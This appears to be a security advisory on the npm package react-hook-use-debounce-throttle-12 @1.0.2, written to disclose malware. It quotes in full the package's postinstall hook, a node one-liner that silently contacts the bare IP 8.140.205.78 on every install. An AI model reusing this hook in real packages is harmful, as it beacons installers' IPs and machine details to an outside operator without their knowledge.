react-hook-use-debounce-throttle-12 @1.0.2

Summary

package.json declares a postinstall hook that runs node -e to issue an HTTPS request to the bare IP 8.140.205.78 on port 80 with all errors silently swallowed: require('https').request({hostname:'8.140.205.78',port:80,path:'/',method:'GET',timeout:3000}).on('error',function(){}).end() . The package advertises itself as a React debounce/throttle hooks library and has no legitimate need for network activity at install time. The destination is a bare IPv4 address with no TLS, no publisher correlation, and no documented purpose; the request fires unconditionally on every npm install , leaking the installer's IP, install timing, and machine footprint to the operator of that host. Author metadata is a generic placeholder ( dev-utils <dev@utils-lib.dev> ) with a repository URL that does not resolve to a real project, and the package name carries a numeric suffix consistent with disposable republishes. The combination of an install-time beacon to attacker-controlled infrastructure, mismatched purpose, silent error handling, and placeholder publisher identity is a victim-enumeration/install-tracking attack.

Source: amazon-inspector (b0a4d8a0470a3e7fcb2da7cdb29ba6412125924a486aa6f4a437ccfbeb5ca4af)